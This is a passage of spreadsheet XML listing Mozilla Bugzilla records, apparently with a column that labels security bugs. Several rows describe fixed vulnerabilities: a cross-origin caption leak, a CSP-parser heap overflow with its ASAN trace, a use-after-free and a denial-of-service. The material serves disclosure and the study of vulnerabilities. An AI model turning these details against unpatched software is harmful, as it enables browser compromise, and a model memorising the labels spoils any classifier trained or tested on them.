  0x0c2280035de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26274==ABORTING
```</t>
        </is>
      </c>
      <c r="X1958" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1959">
      <c r="A1959" t="n">
        <v>1313711</v>
      </c>
      <c r="B1959" t="inlineStr">
        <is>
          <t>2016-10-28 09:30:26 -0700</t>
        </is>
      </c>
      <c r="C1959" t="inlineStr">
        <is>
          <t>Same-Origin-Policy violation via Text Track</t>
        </is>
      </c>
      <c r="D1959" t="inlineStr">
        <is>
          <t>2018-05-24 14:13:38 -0700</t>
        </is>
      </c>
      <c r="E1959" t="n">
        <v>1</v>
      </c>
      <c r="F1959" t="n">
        <v>1</v>
      </c>
      <c r="G1959" t="n">
        <v>3</v>
      </c>
      <c r="H1959" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1959" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1959" t="inlineStr">
        <is>
          <t>Audio/Video: Playback</t>
        </is>
      </c>
      <c r="K1959" t="inlineStr">
        <is>
          <t>52 Branch</t>
        </is>
      </c>
      <c r="L1959" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1959" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1959" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1959" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1959" t="inlineStr">
        <is>
          <t>[adv-main52+][adv-esr45.8+]</t>
        </is>
      </c>
      <c r="Q1959" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1959" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1959" t="inlineStr">
        <is>
          <t>mozilla54</t>
        </is>
      </c>
      <c r="T1959" t="n">
        <v>1</v>
      </c>
      <c r="U1959" t="n">
        <v>0</v>
      </c>
      <c r="V1959" t="n">
        <v>81</v>
      </c>
      <c r="W1959" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Build ID: 20161024030205
Steps to reproduce:
Repro at https://whytls.com/test/crossorigin/index.html
Actual results:
The video refers to a cross-origin text track file; the text tracks are used in the video despite no CORS header permitting cross-origin use. JavaScript can steal the content of the VTT text using &lt;trackId&gt;.track.cues[i].getCueAsHTML().
Expected results:
Captions should not be loaded unless a CORS directive on the VTT response permits cross-origin read access.</t>
        </is>
      </c>
      <c r="X1959" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1960">
      <c r="A1960" t="n">
        <v>1289085</v>
      </c>
      <c r="B1960" t="inlineStr">
        <is>
          <t>2016-07-25 03:41:30 -0700</t>
        </is>
      </c>
      <c r="C1960" t="inlineStr">
        <is>
          <t>Out-of-bounds read in mozilla::net::IsValidReferrerPolicy</t>
        </is>
      </c>
      <c r="D1960" t="inlineStr">
        <is>
          <t>2017-02-09 08:41:04 -0800</t>
        </is>
      </c>
      <c r="E1960" t="n">
        <v>1</v>
      </c>
      <c r="F1960" t="n">
        <v>1</v>
      </c>
      <c r="G1960" t="n">
        <v>3</v>
      </c>
      <c r="H1960" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1960" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1960" t="inlineStr">
        <is>
          <t>DOM: Security</t>
        </is>
      </c>
      <c r="K1960" t="inlineStr">
        <is>
          <t>50 Branch</t>
        </is>
      </c>
      <c r="L1960" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1960" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1960" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1960" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1960" t="inlineStr">
        <is>
          <t>[domsecurity-active][adv-main49+]</t>
        </is>
      </c>
      <c r="Q1960" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1960" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1960" t="inlineStr">
        <is>
          <t>mozilla50</t>
        </is>
      </c>
      <c r="T1960" t="n">
        <v>1</v>
      </c>
      <c r="U1960" t="n">
        <v>0</v>
      </c>
      <c r="V1960" t="n">
        <v>20</v>
      </c>
      <c r="W1960" t="inlineStr">
        <is>
          <t>Created attachment 8774293
firefox-heap-buffer-overflow-IsEmpty10-min.html
Tested on:
OS: Ubuntu 14.04
Firefox: ASAN build from  https://ftp.mozilla.org/pub/firefox/tinderbox-builds/mozilla-central-linux64-asan/1469354528/
Repro-file as an attachment.
ASAN-trace:
==29350==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6030005a6150 at pc 0x7fc156120f40 bp 0x7ffdb447f6b0 sp 0x7ffdb447f6a8
READ of size 4 at 0x6030005a6150 thread T0 (Web Content)
    #0 0x7fc156120f3f in IsEmpty /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dist/include/nsTSubstring.h:242:12
    #1 0x7fc156120f3f in mozilla::net::IsValidReferrerPolicy(nsAString_internal const&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dist/include/mozilla/net/ReferrerPolicy.h:93:0
    #2 0x7fc156143c10 in nsCSPParser::referrerDirectiveValue() /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/security/nsCSPParser.cpp:917:8
    #3 0x7fc156148820 in nsCSPParser::directive() /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/security/nsCSPParser.cpp:1219:3
    #4 0x7fc15614956a in nsCSPParser::policy() /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/security/nsCSPParser.cpp:1258:5
    #5 0x7fc156121997 in nsCSPParser::parseContentSecurityPolicy(nsAString_internal const&amp;, nsIURI*, bool, nsCSPContext*, bool) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/security/nsCSPParser.cpp:1301:25
    #6 0x7fc1561211bb in nsCSPContext::AppendPolicy(nsAString_internal const&amp;, bool, bool) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/security/nsCSPContext.cpp:386:25
    #7 0x7fc15253ba66 in nsHtml5TreeOpExecutor::AddSpeculationCSP(nsAString_internal const&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/parser/html/nsHtml5TreeOpExecutor.cpp:1049:8
    #8 0x7fc15253b392 in nsHtml5SpeculativeLoad::Perform(nsHtml5TreeOpExecutor*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/parser/html/nsHtml5SpeculativeLoad.cpp:31:7
    #9 0x7fc1525b43ea in nsHtml5TreeOpExecutor::RunFlushLoop() /builds/slave/m-cen-l64-asan-000000000000000/build/src/parser/html/nsHtml5TreeOpExecutor.cpp:396:9
    #10 0x7fc1525b916b in nsHtml5ExecutorFlusher::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/src/parser/html/nsHtml5StreamParser.cpp:128:9
.
.
.
0x6030005a6150 is located 8 bytes to the right of 24-byte region [0x6030005a6130,0x6030005a6148)
allocated by thread T0 (Web Content) here:
    #0 0x4b522b in __interceptor_malloc _asan_rtl_:3
    #1 0x4e2efd in moz_xmalloc /builds/slave/m-cen-l64-asan-000000000000000/build/src/memory/mozalloc/mozalloc.cpp:83:17
    #2 0x7fc15040749d in Malloc /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dist/include/nsTArray.h:178:46
    #3 0x7fc15040749d in nsTArrayInfallibleAllocator::ResultTypeProxy nsTArray_base&lt;nsTArrayInfallibleAllocator, nsTArray_CopyWithMemutils&gt;::EnsureCapacity&lt;nsTArrayInfallibleAllocator&gt;(unsigned long, unsigned long) /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dist/include/nsTArray-inl.h:136:0
    #4 0x7fc151423f7c in nsString* nsTArray_Impl&lt;nsString, nsTArrayInfallibleAllocator&gt;::ReplaceElementsAt&lt;nsString, nsTArrayInfallibleAllocator&gt;(unsigned long, unsigned long, nsString const*, unsigned long) /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dist/include/nsTArray.h:1870:32
    #5 0x7fc156149562 in operator= /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dist/include/nsTArray.h:891:7
    #6 0x7fc156149562 in operator= /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dist/include/nsTArray.h:2057:0
    #7 0x7fc156149562 in nsCSPParser::policy() /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/security/nsCSPParser.cpp:1257:0
    #8 0x7fc156121997 in nsCSPParser::parseContentSecurityPolicy(nsAString_internal const&amp;, nsIURI*, bool, nsCSPContext*, bool) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/security/nsCSPParser.cpp:1301:25
.
.
.</t>
        </is>
      </c>
      <c r="X1960" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1961">
      <c r="A1961" t="n">
        <v>2158</v>
      </c>
      <c r="B1961" t="inlineStr">
        <is>
          <t>1999-01-04 20:21:54 -0800</t>
        </is>
      </c>
      <c r="C1961" t="inlineStr">
        <is>
          <t>[PP] Mac Viewer crashes upon resizing - mem partition = 1.5MB</t>
        </is>
      </c>
      <c r="D1961" t="inlineStr">
        <is>
          <t>2008-07-31 01:15:51 -0700</t>
        </is>
      </c>
      <c r="E1961" t="n">
        <v>1</v>
      </c>
      <c r="F1961" t="n">
        <v>1</v>
      </c>
      <c r="G1961" t="n">
        <v>6</v>
      </c>
      <c r="H1961" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1961" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J1961" t="inlineStr">
        <is>
          <t>Viewer App</t>
        </is>
      </c>
      <c r="K1961" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1961" t="inlineStr">
        <is>
          <t>PowerPC</t>
        </is>
      </c>
      <c r="M1961" t="inlineStr">
        <is>
          <t>Mac System 8.5</t>
        </is>
      </c>
      <c r="N1961" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1961" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1961" t="inlineStr"/>
      <c r="Q1961" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1961" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S1961" t="inlineStr">
        <is>
          <t>M2</t>
        </is>
      </c>
      <c r="T1961" t="n">
        <v>1</v>
      </c>
      <c r="U1961" t="n">
        <v>0</v>
      </c>
      <c r="V1961" t="n">
        <v>10</v>
      </c>
      <c r="W1961" t="inlineStr">
        <is>
          <t>* TITLE/SUMMARY
[PP] Resizing Viewer window yields immediate crash
* STEPS TO REPRODUCE
0) Launch Viewer (any web page, including the default res/samples/test0.html)
1) Shrink and expand the window a single time using the resize tool (doesn't
matter if you do diagonally, vertically, or horizontally.)
* RESULT
 - What happened
	Immediate crash into Macsbug during the expansion.
 - What was expected
	No crash. Works fine on XPAppViewer. Will append sc and how from Macsbug.
	This must be a known bug, but I see no P1/P2 Macintosh bugs about crashing
on resizing, so into Bugzilla it goes...
* REGRESSION
 - Occurs On
       viewer (1.4.98 build)
 - Doesn't Occur On
       XPAppViewer (1.4.98 build)
* CONFIGURATIONS TESTED
- PowerMac 8500/150 (233 Mhz 604e), 64 MB RAM, Mac OS 8.5.1, 1024x768 (thousands
of colors)</t>
        </is>
      </c>
      <c r="X1961" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1962">
      <c r="A1962" t="n">
        <v>731183</v>
      </c>
      <c r="B1962" t="inlineStr">
        <is>
          <t>2012-02-28 06:35:53 -0800</t>
        </is>
      </c>
      <c r="C1962" t="inlineStr">
        <is>
          <t>Add robots:noindex to questions that are over 30 days old and have no answers</t>
        </is>
      </c>
      <c r="D1962" t="inlineStr">
        <is>
          <t>2012-03-02 13:49:21 -0800</t>
        </is>
      </c>
      <c r="E1962" t="n">
        <v>1</v>
      </c>
      <c r="F1962" t="n">
        <v>1</v>
      </c>
      <c r="G1962" t="n">
        <v>5</v>
      </c>
      <c r="H1962" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1962" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J1962" t="inlineStr">
        <is>
          <t>Questions</t>
        </is>
      </c>
      <c r="K1962" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1962" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1962" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1962" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1962" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1962" t="inlineStr">
        <is>
          <t>u=user c=questions s=2012.5 p=1</t>
        </is>
      </c>
      <c r="Q1962" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1962" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1962" t="inlineStr">
        <is>
          <t>2012-03-13</t>
        </is>
      </c>
      <c r="T1962" t="n">
        <v>1</v>
      </c>
      <c r="U1962" t="n">
        <v>0</v>
      </c>
      <c r="V1962" t="n">
        <v>2</v>
      </c>
      <c r="W1962" t="inlineStr">
        <is>
          <t>See Bug 729319</t>
        </is>
      </c>
      <c r="X1962" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1963">
      <c r="A1963" t="n">
        <v>54556</v>
      </c>
      <c r="B1963" t="inlineStr">
        <is>
          <t>2000-09-28 14:35:21 -0700</t>
        </is>
      </c>
      <c r="C1963" t="inlineStr">
        <is>
          <t>sanitycheck.cgi can be run by unprivileged accounts</t>
        </is>
      </c>
      <c r="D1963" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:22 -0800</t>
        </is>
      </c>
      <c r="E1963" t="n">
        <v>1</v>
      </c>
      <c r="F1963" t="n">
        <v>1</v>
      </c>
      <c r="G1963" t="n">
        <v>4</v>
      </c>
      <c r="H1963" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I1963" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J1963" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K1963" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1963" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1963" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1963" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1963" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1963" t="inlineStr"/>
      <c r="Q1963" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R1963" t="inlineStr">
        <is>
          <t>minor</t>
        </is>
      </c>
      <c r="S1963" t="inlineStr">
        <is>
          <t>Bugzilla 2.14</t>
        </is>
      </c>
      <c r="T1963" t="n">
        <v>1</v>
      </c>
      <c r="U1963" t="n">
        <v>0</v>
      </c>
      <c r="V1963" t="n">
        <v>17</v>
      </c>
      <c r="W1963" t="inlineStr">
        <is>
          <t>http://bugzilla.mozilla.org/sanitycheck.cgi can be run from an
ordinary bugzilla account (e.g. mine).  On a bugs database
as large as bugzilla.mozilla.org, that effectively counts as
a DoS if done repeatedly.</t>
        </is>
      </c>
      <c r="X1963" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1964">
      <c r="A1964" t="n">
        <v>436853</v>
      </c>
      <c r="B1964" t="inlineStr">
        <is>
          <t>2008-06-02 05:44:57 -0700</t>
        </is>
      </c>
      <c r="C1964" t="inlineStr">
        <is>
          <t>update staging 1.9 release automation to build 3.0.1</t>
        </is>
      </c>
      <c r="D1964" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E1964" t="n">
        <v>1</v>
      </c>
      <c r="F1964" t="n">
        <v>1</v>
      </c>
      <c r="G1964" t="n">
        <v>5</v>
      </c>
      <c r="H1964" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1964" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J1964" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1964" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L1964" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1964" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1964" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1964" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1964" t="inlineStr"/>
      <c r="Q1964" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1964" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1964" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1964" t="n">
        <v>1</v>
      </c>
      <c r="U1964" t="n">
        <v>0</v>
      </c>
      <c r="V1964" t="n">
        <v>5</v>
      </c>
      <c r="W1964" t="inlineStr">
        <is>
          <t>Created attachment 323355
[checked in] update staging 1.9 bootstrap config.</t>
        </is>
      </c>
      <c r="X1964" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1965">
      <c r="A1965" t="n">
        <v>1846689</v>
      </c>
      <c r="B1965" t="inlineStr">
        <is>
          <t>2023-08-02 00:19:32 -0700</t>
        </is>
      </c>
      <c r="C1965" t="inlineStr">
        <is>
          <t>use-after-free in FilePickerShownCallback</t>
        </is>
      </c>
      <c r="D1965" t="inlineStr">
        <is>
          <t>2024-05-30 11:13:21 -0700</t>
        </is>
      </c>
      <c r="E1965" t="n">
        <v>1</v>
      </c>
      <c r="F1965" t="n">
        <v>1</v>
      </c>
      <c r="G1965" t="n">
        <v>3</v>
      </c>
      <c r="H1965" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1965" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1965" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K1965" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1965" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1965" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1965" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1965" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1965" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?] [adv-main117+] [adv-esr115.2+] [adv-esr102.15+]</t>
        </is>
      </c>
      <c r="Q1965" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1965" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S1965" t="inlineStr">
        <is>
          <t>118 Branch</t>
        </is>
      </c>
      <c r="T1965" t="n">
        <v>1</v>
      </c>
      <c r="U1965" t="n">
        <v>0</v>
      </c>
      <c r="V1965" t="n">
        <v>27</v>
      </c>
      <c r="W1965" t="inlineStr">
        <is>
          <t>Created attachment 9346877
ASAN.txt
|FilePickerShownCallback| is requested when a File Picker window open[1]. It isn’t considered several |FilePickerShownCallback| are requested at a time. And |Done()| will destroy |mFilePickerParent|[2]. This leads to use-after-free when another |Done()| is called after a |Done()|
[1]: https://searchfox.org/mozilla-central/source/dom/ipc/FilePickerParent.cpp#239
[2]: https://searchfox.org/mozilla-central/source/dom/ipc/FilePickerParent.cpp#174
REPRODUCE
1. apply *patch.diff
2. visit index.html
3. close serveral File Picker windows
*: Patch to emulate a compromised content process.
Crash State: see asan file</t>
        </is>
      </c>
      <c r="X1965" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1966">
      <c r="A1966" t="n">
        <v>722759</v>
      </c>
      <c r="B1966" t="inlineStr">
        <is>
          <t>2012-01-31 09:57:05 -0800</t>
        </is>
      </c>
      <c r="C1966" t="inlineStr">
        <is>
          <t>Change buildbot configs to upload symbols to symbols1.dmz.phx1.mozilla.com</t>
        </is>
      </c>
      <c r="D1966" t="inlineStr">
        <is>
          <t>2018-05-08 15:19:48 -0700</t>
        </is>
      </c>
      <c r="E1966" t="n">
        <v>1</v>
      </c>
      <c r="F1966" t="n">
        <v>1</v>
      </c>
      <c r="G1966" t="n">
        <v>5</v>
      </c>
      <c r="H1966" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1966" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J1966" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1966" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L1966" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1966" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1966" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1966" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1966" t="inlineStr">
        <is>
          <t>[symbols][upload]</t>
        </is>
      </c>
      <c r="Q1966" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1966" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1966" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1966" t="n">
        <v>1</v>
      </c>
      <c r="U1966" t="n">
        <v>0</v>
      </c>
      <c r="V1966" t="n">
        <v>15</v>
      </c>
      <c r="W1966" t="inlineStr">
        <is>
          <t>bug 688186 is going to replace dm-symbolpush01 with symbols1.dmz.phx1.mozilla.com. There will be a transition period where we run them both in parallel, but we'll eventually kill dm-symbolpush01. We'll need to change the buildbot configs to point to the new machine. (We'll probably also need to pre-accept the SSH host key from the new machine so that uploads don't hang.)
There will probably be a NetOps bug blocking this one to get the networking details worked out.</t>
        </is>
      </c>
      <c r="X1966" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1967">
      <c r="A1967" t="n">
        <v>15339</v>
      </c>
      <c r="B1967" t="inlineStr">
        <is>
          <t>1999-10-01 01:39:08 -0700</t>
        </is>
      </c>
      <c r="C1967" t="inlineStr">
        <is>
          <t>New Configuration "Error" dialog needs to be system modal.</t>
        </is>
      </c>
      <c r="D1967" t="inlineStr">
        <is>
          <t>1999-10-21 15:47:41 -0700</t>
        </is>
      </c>
      <c r="E1967" t="n">
        <v>1</v>
      </c>
      <c r="F1967" t="n">
        <v>1</v>
      </c>
      <c r="G1967" t="n">
        <v>6</v>
      </c>
      <c r="H1967" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1967" t="inlineStr">
        <is>
          <t>CCK Graveyard</t>
        </is>
      </c>
      <c r="J1967" t="inlineStr">
        <is>
          <t>CCK-Wizard</t>
        </is>
      </c>
      <c r="K1967" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L1967" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1967" t="inlineStr">
        <is>
          <t>Windows NT</t>
        </is>
      </c>
      <c r="N1967" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1967" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1967" t="inlineStr"/>
      <c r="Q1967" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1967" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1967" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1967" t="n">
        <v>1</v>
      </c>
      <c r="U1967" t="n">
        <v>0</v>
      </c>
      <c r="V1967" t="n">
        <v>6</v>
      </c>
      <c r="W1967" t="inlineStr">
        <is>
          <t>Latest cck build dated: 09-30-99
tested on WinNT40 &amp; Win98
Steps to reproduce:
1- Launch CCK tool (clean install, no pre-existing configurations)
2- Select the "Next" button (Error dialog appears)
3- While the "Error" dialog is present, select on the CCK Tool's Welcome screen.
Results:
The "Error" dialog becomes out of focus.
Expected:
The Error dialog should be system modal. This is a dialog box that
has the focus and disables task switching to any other application until user
selects the [OK] button.</t>
        </is>
      </c>
      <c r="X1967" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1968">
      <c r="A1968" t="n">
        <v>657201</v>
      </c>
      <c r="B1968" t="inlineStr">
        <is>
          <t>2011-05-15 01:42:57 -0700</t>
        </is>
      </c>
      <c r="C1968" t="inlineStr">
        <is>
          <t>WebGL crash [@createProgram/@gldCopyTexSubImage]</t>
        </is>
      </c>
      <c r="D1968" t="inlineStr">
        <is>
          <t>2016-07-05 02:17:44 -0700</t>
        </is>
      </c>
      <c r="E1968" t="n">
        <v>1</v>
      </c>
      <c r="F1968" t="n">
        <v>1</v>
      </c>
      <c r="G1968" t="n">
        <v>3</v>
      </c>
      <c r="H1968" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1968" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1968" t="inlineStr">
        <is>
          <t>Graphics: CanvasWebGL</t>
        </is>
      </c>
      <c r="K1968" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1968" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1968" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N1968" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1968" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1968" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q1968" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1968" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1968" t="inlineStr">
        <is>
          <t>mozilla6</t>
        </is>
      </c>
      <c r="T1968" t="n">
        <v>1</v>
      </c>
      <c r="U1968" t="n">
        <v>0</v>
      </c>
      <c r="V1968" t="n">
        <v>16</v>
      </c>
      <c r="W1968" t="inlineStr">
        <is>
          <t>Created attachment 532499
testcase
Sometimes it crashes in createProgram, sometimes in gldCopyTexSubImage.
The bug is currently only reproducible against:
ProductName:	Mac OS X
ProductVersion:	10.6.7
BuildVersion:	10J869
OpenGL renderer string: ATI Radeon HD 6750M OpenGL Engine
OpenGL version string: 2.1 ATI-1.6.32
I have marked this as a security issue because I get some write violations at different places.</t>
        </is>
      </c>
      <c r="X1968" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1969">
      <c r="A1969" t="n">
        <v>1443349</v>
      </c>
      <c r="B1969" t="inlineStr">
        <is>
          <t>2018-03-05 15:52:12 -0800</t>
        </is>
      </c>
      <c r="C1969" t="inlineStr">
        <is>
          <t>CSP Warnings in console from Google Auth</t>
        </is>
      </c>
      <c r="D1969" t="inlineStr">
        <is>
          <t>2018-07-17 18:29:54 -0700</t>
        </is>
      </c>
      <c r="E1969" t="n">
        <v>1</v>
      </c>
      <c r="F1969" t="n">
        <v>1</v>
      </c>
      <c r="G1969" t="n">
        <v>4</v>
      </c>
      <c r="H1969" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I1969" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J1969" t="inlineStr">
        <is>
          <t>Webapp</t>
        </is>
      </c>
      <c r="K1969" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1969" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1969" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1969" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1969" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1969" t="inlineStr"/>
      <c r="Q1969" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1969" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1969" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1969" t="n">
        <v>1</v>
      </c>
      <c r="U1969" t="n">
        <v>0</v>
      </c>
      <c r="V1969" t="n">
        <v>3</v>
      </c>
      <c r="W1969" t="inlineStr">
        <is>
          <t>Visiting https://crash-stats.mozilla.com/home/product/Firefox produces the following errors in the JS console on Nightly:
```
Content Security Policy: Ignoring “'unsafe-inline'” within script-src: ‘strict-dynamic’ specified
Content Security Policy: Ignoring “https:” within script-src: ‘strict-dynamic’ specified
Content Security Policy: Ignoring “http:” within script-src: ‘strict-dynamic’ specified
```
These appear to be caused by the following CSP header from the Google login iframe loaded for the login button:
```
